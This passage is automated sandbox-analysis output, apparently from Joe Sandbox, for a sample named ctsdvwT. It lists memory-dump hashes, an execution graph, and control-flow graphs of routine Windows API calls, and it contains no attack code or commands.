                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • API String ID:
                                            • Opcode ID: 0671f06bc3f89ad7cb68b6e4f028c35bb89c056091ccf5ae0725b02e27af3ad0
                                            • Instruction ID: d34737c296bba218f3097ed952af303f604667f97b554732722cfc9b9d705c3a
                                            • Opcode Fuzzy Hash: 0671f06bc3f89ad7cb68b6e4f028c35bb89c056091ccf5ae0725b02e27af3ad0
                                            • Instruction Fuzzy Hash: 1111C276F002455FCB119F75980DA2F7FF5EB48690B140465EA49D3340EB34C842CB92
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9b4348566fcad3e90b41c4648cc18c1214d40291e7927370024c3183228cd1f1
                                            • Instruction ID: c8927eb066eaebb811a1ecfbda12492b3997a811788d781dc607c83a7a3997c7
                                            • Opcode Fuzzy Hash: 9b4348566fcad3e90b41c4648cc18c1214d40291e7927370024c3183228cd1f1
                                            • Instruction Fuzzy Hash: D5113031E002159FCF61EFB889582BEBBF5EF49250B24447AD509E7742EB75C8428B91
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d9ce69cc3c6e64a676524c05c5be2eb6d1914ca89566669b8c88c74a2c59ab5f
                                            • Instruction ID: a80197806f2c9f8ab174a7f198e779acd16f0e266105e0dc5a4ae7e3a60655e4
                                            • Opcode Fuzzy Hash: d9ce69cc3c6e64a676524c05c5be2eb6d1914ca89566669b8c88c74a2c59ab5f
                                            • Instruction Fuzzy Hash: DB014431E003158FCF61EFB889582BEB7F5EF49291B24047AD909E7341EB75D9428BA1
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bcdf0790375c878daeb9f0f6169ed6dc01f708429be875af17b4f968ea58c5bd
                                            • Instruction ID: a353d1f30eaf53dea7f0badfba94e55cac2a23cfdcdd6954bfc1dc43f40824db
                                            • Opcode Fuzzy Hash: bcdf0790375c878daeb9f0f6169ed6dc01f708429be875af17b4f968ea58c5bd
                                            • Instruction Fuzzy Hash: 32F02B73E04250CFD7228BB498941BDFBB1EE5529175800D7D60ADB752D761D842CB51
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0275dfdbae2ed136e1739f5cdbfd2be4f41b8d2b41f90f4c5fca7db74da353f0
                                            • Instruction ID: c94b830ec59f713a47b941ab48106fae62f524c3af4174258afa3d97f7e4e308
                                            • Opcode Fuzzy Hash: 0275dfdbae2ed136e1739f5cdbfd2be4f41b8d2b41f90f4c5fca7db74da353f0
                                            • Instruction Fuzzy Hash: CC01627094010EAFCB41EBB9F940A8DBBB1FB44304F108279C4059B295DB359E859B95
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5d6af0ecb585b1d237b229a6baf6251990ee098715dd1dbb3492fd4c6636419b
                                            • Instruction ID: 407efcecbe1f57dee27fa350db7e7e9ff2e78ad51c8547143c6058b0ed42a352
                                            • Opcode Fuzzy Hash: 5d6af0ecb585b1d237b229a6baf6251990ee098715dd1dbb3492fd4c6636419b
                                            • Instruction Fuzzy Hash: 58F0313094020DAFCB41EBA9F940A9DB7B5EB44304F108279C4059B2A4DB31AE899B95
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 600e5aa2a9e667826730cf1907dfe4cc76ca8c52e1d4ce9549b1df760e50ac95
                                            • Instruction ID: 7ac018ea0472779828d38047c18dd85b3551be7e8085a563de234104ff49be41
                                            • Opcode Fuzzy Hash: 600e5aa2a9e667826730cf1907dfe4cc76ca8c52e1d4ce9549b1df760e50ac95
                                            • Instruction Fuzzy Hash: D3C012363040504F85019728E05447937B5DBC9169314019AD145CB322CE1558028F40

                                            Execution Graph

Execution Coverage: 7.6%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 48
Total number of Limit Nodes: 8
                                            execution_graph 20669 7091b98 20671 7091bbe 20669->20671 20674 7091d58 20669->20674 20670 7091d23 20670->20670 20671->20670 20675 7091e18 PostMessageW 20671->20675 20677 7091e12 PostMessageW 20671->20677 20676 7091e84 20675->20676 20676->20671 20678 7091e84 20677->20678 20678->20671 20679 fcd588 DuplicateHandle 20680 fcd61e 20679->20680 20681 fc4668 20682 fc467a 20681->20682 20683 fc4686 20682->20683 20685 fc4779 20682->20685 20686 fc479d 20685->20686 20690 fc4888 20686->20690 20694 fc4879 20686->20694 20692 fc48af 20690->20692 20691 fc498c 20691->20691 20692->20691 20698 fc44b4 20692->20698 20695 fc48af 20694->20695 20696 fc498c 20695->20696 20697 fc44b4 CreateActCtxA 20695->20697 20696->20696 20697->20696 20699 fc5918 CreateActCtxA 20698->20699 20701 fc59db 20699->20701 20653 7094100 CloseHandle 20654 7094167 20653->20654 20655 fcafb0 20659 fcb0a8 20655->20659 20664 fcb097 20655->20664 20656 fcafbf 20660 fcb0dc 20659->20660 20661 fcb0b9 20659->20661 20660->20656 20661->20660 20662 fcb2e0 GetModuleHandleW 20661->20662 20663 fcb30d 20662->20663 20663->20656 20665 fcb0dc 20664->20665 20666 fcb0b9 20664->20666 20665->20656 20666->20665 20667 fcb2e0 GetModuleHandleW 20666->20667 20668 fcb30d 20667->20668 20668->20656 20702 fcd340 20703 fcd386 GetCurrentProcess 20702->20703 20705 fcd3d8 GetCurrentThread 20703->20705 20706 fcd3d1 20703->20706 20707 fcd415 GetCurrentProcess 20705->20707 20709 fcd40e 20705->20709 20706->20705 20708 fcd44b 20707->20708 20710 fcd473 GetCurrentThreadId 20708->20710 20709->20707 20711 fcd4a4 20710->20711

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 513 fcd331-fcd3cf GetCurrentProcess 517 fcd3d8-fcd40c GetCurrentThread 513->517 518 fcd3d1-fcd3d7 513->518 519 fcd40e-fcd414 517->519 520 fcd415-fcd449 GetCurrentProcess 517->520 518->517 519->520 522 fcd44b-fcd451 520->522 523 fcd452-fcd46d call fcd50f 520->523 522->523 526 fcd473-fcd4a2 GetCurrentThreadId 523->526 527 fcd4ab-fcd50d 526->527 528 fcd4a4-fcd4aa 526->528 528->527
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 00FCD3BE
                                            • GetCurrentThread.KERNEL32 ref: 00FCD3FB
                                            • GetCurrentProcess.KERNEL32 ref: 00FCD438
                                            • GetCurrentThreadId.KERNEL32 ref: 00FCD491
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912551911.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_fc0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: a8e5db1faac50e9f293136ee6eb43e9e8104ff1967c9732009b43180182855cc
                                            • Instruction ID: 2c58fa1efd3881336e9131b8a6ebb7d7baed7a8c69b05ffe31c22f36afe46508
                                            • Opcode Fuzzy Hash: a8e5db1faac50e9f293136ee6eb43e9e8104ff1967c9732009b43180182855cc
                                            • Instruction Fuzzy Hash: 625165B0D01349CFDB18DFA9D648B9EBBF1AF48314F20C569D519A72A1DB34A884CF25

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 535 fcd340-fcd3cf GetCurrentProcess 539 fcd3d8-fcd40c GetCurrentThread 535->539 540 fcd3d1-fcd3d7 535->540 541 fcd40e-fcd414 539->541 542 fcd415-fcd449 GetCurrentProcess 539->542 540->539 541->542 544 fcd44b-fcd451 542->544 545 fcd452-fcd46d call fcd50f 542->545 544->545 548 fcd473-fcd4a2 GetCurrentThreadId 545->548 549 fcd4ab-fcd50d 548->549 550 fcd4a4-fcd4aa 548->550 550->549
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 00FCD3BE
                                            • GetCurrentThread.KERNEL32 ref: 00FCD3FB
                                            • GetCurrentProcess.KERNEL32 ref: 00FCD438
                                            • GetCurrentThreadId.KERNEL32 ref: 00FCD491
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912551911.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_fc0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 5775f36c75900b7d686f1dbdad95518c5e54dabfbbec85a52a8f69845d6a3d52
                                            • Instruction ID: 3c53837b825a35828c81110308ccb054f64d55505d9c355d5721f098c59bcaa5
                                            • Opcode Fuzzy Hash: 5775f36c75900b7d686f1dbdad95518c5e54dabfbbec85a52a8f69845d6a3d52
                                            • Instruction Fuzzy Hash: FD5178B0D00249CFCB18DFAAD648B9EBBF1AF48314F20C569D519A7360DB34A844CF65

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 580 fcb0a8-fcb0b7 581 fcb0b9-fcb0c6 call fc9b14 580->581 582 fcb0e3-fcb0e7 580->582 587 fcb0dc 581->587 588 fcb0c8 581->588 583 fcb0e9-fcb0f3 582->583 584 fcb0fb-fcb13c 582->584 583->584 591 fcb13e-fcb146 584->591 592 fcb149-fcb157 584->592 587->582 635 fcb0ce call fcb340 588->635 636 fcb0ce call fcb331 588->636 591->592 594 fcb159-fcb15e 592->594 595 fcb17b-fcb17d 592->595 593 fcb0d4-fcb0d6 593->587 596 fcb218-fcb2d8 593->596 598 fcb169 594->598 599 fcb160-fcb167 call fcad10 594->599 597 fcb180-fcb187 595->597 630 fcb2da-fcb2dd 596->630 631 fcb2e0-fcb30b GetModuleHandleW 596->631 602 fcb189-fcb191 597->602 603 fcb194-fcb19b 597->603 601 fcb16b-fcb179 598->601 599->601 601->597 602->603 605 fcb19d-fcb1a5 603->605 606 fcb1a8-fcb1b1 call fcad20 603->606 605->606 611 fcb1be-fcb1c3 606->611 612 fcb1b3-fcb1bb 606->612 613 fcb1c5-fcb1cc 611->613 614 fcb1e1-fcb1ee 611->614 612->611 613->614 616 fcb1ce-fcb1de call fcad30 call fcad40 613->616 621 fcb1f0-fcb20e 614->621 622 fcb211-fcb217 614->622 616->614 621->622 630->631 632 fcb30d-fcb313 631->632 633 fcb314-fcb328 631->633 632->633 635->593 636->593
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00FCB2FE
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912551911.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_fc0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: aee581c80414f25feb11389e5ede40a39eba1d0e9095f8701f95b2255d1e9d62
                                            • Instruction ID: 2c87ea16340d483abc2c5e151d81e9e5d100fcd2a9607ee02fb909e125c7ed45
                                            • Opcode Fuzzy Hash: aee581c80414f25feb11389e5ede40a39eba1d0e9095f8701f95b2255d1e9d62
                                            • Instruction Fuzzy Hash: D9714474A00B068FD724DF29D656B9ABBF1FF88314F008A2DD48AD7A50D735E945CB90

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 637 fc590c-fc59d9 CreateActCtxA 639 fc59db-fc59e1 637->639 640 fc59e2-fc5a3c 637->640 639->640 647 fc5a3e-fc5a41 640->647 648 fc5a4b-fc5a4f 640->648 647->648 649 fc5a60 648->649 650 fc5a51-fc5a5d 648->650 651 fc5a61 649->651 650->649 651->651
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 00FC59C9
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912551911.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_fc0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: c1bf172eea89b8e641837bbbdac1184ed9e54f5007669f21b9c7c6f0f1c33e9c
                                            • Instruction ID: 36e313bf47be67f960a33570b8b3599c39749e2bd7d2de81733ca79536ceaa81
                                            • Opcode Fuzzy Hash: c1bf172eea89b8e641837bbbdac1184ed9e54f5007669f21b9c7c6f0f1c33e9c
                                            • Instruction Fuzzy Hash: 2B4127B0C00619CEDB24CFA9C984B8EBBF5BF45304F20816AD048AB255DB756986CF90

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 653 fc44b4-fc59d9 CreateActCtxA 656 fc59db-fc59e1 653->656 657 fc59e2-fc5a3c 653->657 656->657 664 fc5a3e-fc5a41 657->664 665 fc5a4b-fc5a4f 657->665 664->665 666 fc5a60 665->666 667 fc5a51-fc5a5d 665->667 668 fc5a61 666->668 667->666 668->668
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 00FC59C9
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912551911.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_fc0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: ce460b27709fd637c63e78d28b653dc231d69159c46bfd6ac44bdb3ddfd79dc1
                                            • Instruction ID: dd4232f528f83b519de342aa71fac3e3f2369ce12319524805967db8838661b1
                                            • Opcode Fuzzy Hash: ce460b27709fd637c63e78d28b653dc231d69159c46bfd6ac44bdb3ddfd79dc1
                                            • Instruction Fuzzy Hash: C04104B0C00719CBDB24CFAAC945B8EBBF5BF49704F208069D408AB255DB756986CF90

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 670 fcd580-fcd61c DuplicateHandle 671 fcd61e-fcd624 670->671 672 fcd625-fcd642 670->672 671->672
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00FCD60F
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912551911.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_fc0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: d2af6de11a69ccc4b513db85420b6f8270ad0fd8e078f70d59e5b1334add2856
                                            • Instruction ID: f85c55dd61638964c2aeeacbbd41764fb8a988d6e12559558a165264938586a5
                                            • Opcode Fuzzy Hash: d2af6de11a69ccc4b513db85420b6f8270ad0fd8e078f70d59e5b1334add2856
                                            • Instruction Fuzzy Hash: 5421F2B5D002499FDB10CFAAD584AEEBFF4EB48320F14846AE858A3250D378A940DF65

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 675 fcd588-fcd61c DuplicateHandle 676 fcd61e-fcd624 675->676 677 fcd625-fcd642 675->677 676->677
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00FCD60F
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912551911.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_fc0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 4589e64891279dcce019d97a5658d73f421bcc727c737ea572b3f44bcd8d160a
                                            • Instruction ID: 5de87785a1de217ffd8801a996876e70be31632104165cbe8969ae4df53e3637
                                            • Opcode Fuzzy Hash: 4589e64891279dcce019d97a5658d73f421bcc727c737ea572b3f44bcd8d160a
                                            • Instruction Fuzzy Hash: 6021E4B59002499FDB10CF9AD984ADEFBF8EB48320F14841AE918A3350D374A940DFA5

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 680 fcb298-fcb2d8 681 fcb2da-fcb2dd 680->681 682 fcb2e0-fcb30b GetModuleHandleW 680->682 681->682 683 fcb30d-fcb313 682->683 684 fcb314-fcb328 682->684 683->684
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00FCB2FE
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912551911.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_fc0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 447b6b873aa53074d6ab811bf273db0cbd5e424f8490c26d39aa31ede1740d02
                                            • Instruction ID: b7752b9c313fb56163b2785d6970c55d5806b37412b42780bd779351236ccf5c
                                            • Opcode Fuzzy Hash: 447b6b873aa53074d6ab811bf273db0cbd5e424f8490c26d39aa31ede1740d02
                                            • Instruction Fuzzy Hash: 7511E0B5C007498FCB14CF9AD545BDEFBF8AF88324F10842AD459A7210C379A545CFA5

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 690 7091e18-7091e82 PostMessageW 691 7091e8b-7091e9f 690->691 692 7091e84-7091e8a 690->692 692->691
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 07091E75
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1920924993.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7090000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: d8792959dcbec85326d38b8be328f3c3994ddf90adfbe6a3fe6f98d048ef11ef
                                            • Instruction ID: 97652f4b04ffe982fe8c89ceacbee63167499c3e6acd0a804ad57de3c301e26d
                                            • Opcode Fuzzy Hash: d8792959dcbec85326d38b8be328f3c3994ddf90adfbe6a3fe6f98d048ef11ef
                                            • Instruction Fuzzy Hash: 181115B5800349DFDB10CF9AC444BDEFBF8EB48324F108419D558A7250C375A544CFA5

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 686 7091e12-7091e82 PostMessageW 687 7091e8b-7091e9f 686->687 688 7091e84-7091e8a 686->688 688->687
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 07091E75
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1920924993.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7090000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 34458ec19cca24aa53b8b5da1114db2b35eb02cb9abeb0d23516fddf89afa04c
                                            • Instruction ID: 2bad3271ad0dd96928767533fad53a2e903cc9059c190af3a44512e14853b814
                                            • Opcode Fuzzy Hash: 34458ec19cca24aa53b8b5da1114db2b35eb02cb9abeb0d23516fddf89afa04c
                                            • Instruction Fuzzy Hash: 0011E0B58002499FDB10CF9AC585BDEBBF8EB48324F10841AE558A7250C375A584CFA5
                                            APIs
                                            • CloseHandle.KERNELBASE(?), ref: 07094158
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1920924993.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7090000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: d6f48612e5181e81302b04d1e6f8c17bee8ec3bba58e54fa87fbe5bb8b1f3574
                                            • Instruction ID: ee593740e7c236c008794df1ea09d3ab673752956a320c137c99e0512be0c35f
                                            • Opcode Fuzzy Hash: d6f48612e5181e81302b04d1e6f8c17bee8ec3bba58e54fa87fbe5bb8b1f3574
                                            • Instruction Fuzzy Hash: 4F1136B6800359CFCB10DF9AC545BDEBBF4EB48320F208429E568A7341D339A945CFA5
                                            APIs
                                            • CloseHandle.KERNELBASE(?), ref: 07094158
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1920924993.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7090000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: 71a0b56d5c11171cad6b0137e9534fc8d8fc64114b43e6e0f79a1a48acb4eda9
                                            • Instruction ID: 8652b796692a7698533ab3b194e5e5f3cb49c1ad0ba44a719ba8d25906f0cae2
                                            • Opcode Fuzzy Hash: 71a0b56d5c11171cad6b0137e9534fc8d8fc64114b43e6e0f79a1a48acb4eda9
                                            • Instruction Fuzzy Hash: 3E1103B5800359CFCB20DF9AC545BDEBBF4EB48320F20852AE568A7350D739A545CFA5
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912170864.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_e5d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4d180375ccdcc91a689173c47b3466af5cf688256cbc6caaa387fa280ff8187f
                                            • Instruction ID: fb6b613e4bc92499643022317cb91899c1f211766e6f267f8983eb9fe18bc630
                                            • Opcode Fuzzy Hash: 4d180375ccdcc91a689173c47b3466af5cf688256cbc6caaa387fa280ff8187f
                                            • Instruction Fuzzy Hash: D7212271508240DFCB25DF14DDC0B2ABF65FB98329F20C969EC095B256D336D85ACAA2
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912170864.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_e5d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cbc363115d4013f1757a777d87375deb12f4f1301e7b151477d3bd37e1536e8d
                                            • Instruction ID: 43e325022ab2ebbac15b7db03328d0da77368e01078743ba022eccf618b1e99f
                                            • Opcode Fuzzy Hash: cbc363115d4013f1757a777d87375deb12f4f1301e7b151477d3bd37e1536e8d
                                            • Instruction Fuzzy Hash: 51214871108204DFDB24DF04CDC0B26BF65FB94325F20C969DC095B256C336E85AC6A2
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912305195.0000000000E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E6D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_e6d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 96fd713a5eea0aac2f39a3eeb98cf246c092ea45e24da9823335fbe2c15f9bdd
                                            • Instruction ID: 431fb8ccebf31b2c07b3896e77e4fd811c0374a687b25b4dffa1e2f680e1e4e2
                                            • Opcode Fuzzy Hash: 96fd713a5eea0aac2f39a3eeb98cf246c092ea45e24da9823335fbe2c15f9bdd
                                            • Instruction Fuzzy Hash: 0C213771A88200DFCB54DF14E9C4B26BF66FB84318F60C56DD8095B296C337D847CA61
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912305195.0000000000E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E6D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_e6d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3a3c4793dd24dc4361731ebafd5b28f64c2a249b87837170d8202ab916fe5719
                                            • Instruction ID: cfce3304ff4517aef70c5ba1848a1adb439aa4f0bd469f8f63a644f7e0cc145a
                                            • Opcode Fuzzy Hash: 3a3c4793dd24dc4361731ebafd5b28f64c2a249b87837170d8202ab916fe5719
                                            • Instruction Fuzzy Hash: F621537554D3808FD712CF24D994715BF72EB46318F28C5EAD8498F6A7C33A980ACB62
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912170864.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_e5d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                            • Instruction ID: 63c6f2424861e7c9f8304842462c31bb85603cf4b2df3db7145ff4367eddb508
                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                            • Instruction Fuzzy Hash: 43110372404240CFDB16CF00D9C4B16BF72FB94328F24C6A9DC090B256C33AE85ACBA1
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912170864.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_e5d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                            • Instruction ID: 8df7470540101eb16b47730e128ebb8c5522de945c79b3587e744e351e8d7b3d
                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                            • Instruction Fuzzy Hash: 7211E676504280CFCB16CF14D9C4B16BF71FB94328F24C6A9DC494B656C336D85ACBA1
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912170864.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_e5d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4df0d73b50de95f34153817a62ea2d44f50db4f04bee32e1d69af2f79d784157
                                            • Instruction ID: 8454bfcf82c15d3a8399d9257ea761a4ee3442d3b3f1af518a8f3ebdb473ac9b
                                            • Opcode Fuzzy Hash: 4df0d73b50de95f34153817a62ea2d44f50db4f04bee32e1d69af2f79d784157
                                            • Instruction Fuzzy Hash: 0901A77110D3449AE7204A25CD847A7FF98EF49326F18C96BED095A196C2799848C671
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912170864.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_e5d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 34799ed5a807e10bea4f1b9884893e27110358cb9cc3f35fe571685db4ddd16d
                                            • Instruction ID: 28a2e61e2d0b1897201e46467e4d56204584fe0d1d0a267388c8517296dd0d59
                                            • Opcode Fuzzy Hash: 34799ed5a807e10bea4f1b9884893e27110358cb9cc3f35fe571685db4ddd16d
